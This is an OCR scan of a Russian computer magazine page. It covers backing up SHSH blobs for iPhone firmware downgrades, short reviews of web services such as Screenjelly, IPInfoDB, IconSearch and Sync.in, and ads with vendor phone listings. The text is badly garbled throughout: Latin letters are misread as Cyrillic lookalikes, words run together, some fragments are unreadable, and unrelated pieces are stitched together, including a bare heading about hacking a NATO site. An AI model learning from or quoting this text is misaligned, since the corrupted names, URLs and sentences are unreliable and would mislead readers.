компании Арріе, передавая так называемый 
номер БОЮ (уникальный идентификатор чипа 
девайса) и номертекущей прошивки. Сервер в 
свою очередь отправляет в отчеттот самый 5Н5Н 
— специальный идентификатор для модуля 
іВооІ:, который отвечаетза загрузку устройства. В 
зависимости от идентификатора іВооІлибо раз- 
решаетпрошитьдевайс, либо не разрешает. Так 
зачем нужно бэкапить5Н5Н? Резон есть: какую 
бы новую защиту не придумала Арріе, отключив 
возможность добраться до системных файлов 
девайса (то есть сделать ЗаіІЬгеак), пользователь 
всегда может откатить прошивку до той версии, 
где такая возможность имеется. Но это возможно 
только втом случае, если у него есть правильный 
5Н5Н, который когда-то был выдан Арріе. Сде- 
лать бэкап 5Н5Н позволяетутилита ТіпуСтЬгеиа 
( іЬебгтѵѵагеиппЬгеиа.ЫодзроТсоіт ) 
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взлом АУТЕНТИФИКАЦИИ НА САЙТЕ НАТО 





I 




I 




г » 



НТТР://ѴѴѴѴѴѴ2 




5сге«11|«11у 






ѴѴНАТ'З оы ѵоик зсічеем? 



№чѵИ I т»И [х«4'І ^ чр ( в 



ѴѴііаІ ІЯ ЗсгеегцеІЕу? 

КгнпА ГВСОЛі )<нг КГНЛ ЛСМГр 



Ш» ІТКГѴКЯУ Ѵ|!б V 

МЛМП 41. Ѣ Ь^, «Г|Л[«»И 



I 







5СРЕЕШЕІІУ 

\л/\/у\л/.5сгееп]еиу.сот 
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ІРІЫРООВ 

\л/\л/\л/.1р1п[ос1Ь.сот 



В ОДНОЙ из рубрикѴѴѴѴѴѴ2 мы рассказывали о замечательном сервисе 
ЗегеепТоазІег, позволяющем прямо из браузера записать скринкаст и 
разместить на специальном хостинге в Сети. Ксожалению, 31 июля он 
прекращаетсвое существование. Надо сказать, что сервисов с аналогич- 
ными возможностямитеперьдовольно много, ноесли искать альтернати- 
ву, то я бы, безусловно, выбрал Зсгеещеиу. За все время я уже успел запи- 
сать с десятокскринкастов с отличным качеством изѴѴіпбоѵѵзи МасОЗХ 
с безупречно наложенной голосовой дорожкой, записанной с микрофона. 



По большому счету, ІРіпІоОВ — это ежемесячно обновляемая база диапа- 
зонов ІР-адресов, привязанных к разным странам. Другими словами, тут 
можно быстро посмотреть, какой стране принадлежиттотили иной ІР. Но 
это все ерунда; главное, что внутри сервиса есть несколько встроенных 
инструментов для генерации правил файервола и .Ыассезз, с помощью 
которых можно заблокировать доступ ксерверу по географическому 
признаку. Если нужно быстро отразить наплыв ботов из Китая или откуда- 
либо еще — это очень хороший помощник. 



і іСйК^ЁАЙСН 



Результаты поиска 

Почанни рыудштіти с 1 па 24 иі 9і9'ніілп 'картина', ртіпар; лнФай 
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Для совместной работы над 
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5ѴМС.ІМ 

ѴѴ\/Ѵ\А/.5уПС.ІП 



«Делаем поиск иконок проще», — гл а сит лейбл на главной странице 
ІсопЗеагсЬ’а. И не обманывает. По сути, это сервис для поиска картинок, 
похожий на тот, что естьу боодіе и Яндекса, но предназначенный 
специально для нахождения иконок. Набираешь слово «Корзина», и в 
результате получаешь 519 различных вариантов привычного образа. 
Всего в системе сейчас 133673 иконок. Причем это не краденые изобра- 
жения: все представленные РМб-файлы распространяются подлицен- 
зиями, позволяющими бесплатно использовать их, правда, в некоторых 
случаях с ограничениями. 



Еще одним замечательным сервисом, который прекратил свое существо- 
вание в этом году, стал онлайн-редактор ЕіЬеграб, позволяющий несколь- 
ким людям одновременно работать с одним и тем же текстом. Фишка втом, 
что изменения пользователей отображались каждому из них в реальном 
времени. Компания Ооодіе, купившая сервис, прикрыла его, реализовав 
его функциональность в Ооодіе Поев и Ооодіе ѴѴаѵе. Но привычной про- 
стоты нехватает! Ксчастью, сейчас семимильными шагами развивается 
полный клон ЕіЬеграб’а — сервис Зупс.іп. Для начала работы достаточно 
нажать «Сгеаіе а риЫіс поіе» и поделиться ссылкой (например, вупс.іп/ 
тгТѵрсоККА) с нужными людьми. 
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Наш РС никогда не висит! 




А Альфа Банк (дате)іаиіі 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно для регионов России) ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ. 



МЕС Оізріау Зоіиііопз ЕтроѵѵегесІ Ьу Іппоѵа1:іоп 




Компания МЕС Оізріау Зоіиііопз является одним из ведущих 
мировых производителей, предлагающим широкий спектр 
инновационных продуктов и решений по визуализации 
информации: офисные, профессиональные и 
специализированные настольные ЖК-мониторы; 
широкоформатные ЖК-дисплеи для общественных мест; 
проекторы для различных сфер применения - 
от портативных моделей для презентаций до цифровых 
кинопроекторов. 

Подробная информация; ѵѵѵт.пес-сіізріау-зоіиііопа.ги 

Представительство в Москве: Тел.: (495) 937-8410, Факс (495) 937-8290 реклама 




ОРІОАМІ Сотри^егз 
+7(495) 774-3667 
+7(495) 982-3904 
ѵѵѵѵѵѵ.огідатіс.ги 



Легион 

+7(495)601-9040 

+7(812)327-3129 

\лАллл/.Іедіоп.ги 



□І5ТІ ОРОУР 
+7(495) 662-9237 
+7(495) 662-9240 

\лАЛАл/.сІІ8І:і.ги 



Ланк 

+7(495) 730-2829 
+7(812)333-0111 
\лАЛАл/.1апск.ги 



КомпьюЛинк 
+7(495)956-3311 
+7(495) 737-8866 
\лАллл/.сотриІіпк.ги 



Тгіпііу еіесіігопіс 
+7(495) 737-8046 
\лллАл/.ігі-еІ.ги 



АУѴІХ 

+7(495)797-5775 

ѵѵѵѵѵѵ.аиѵіх.ги 






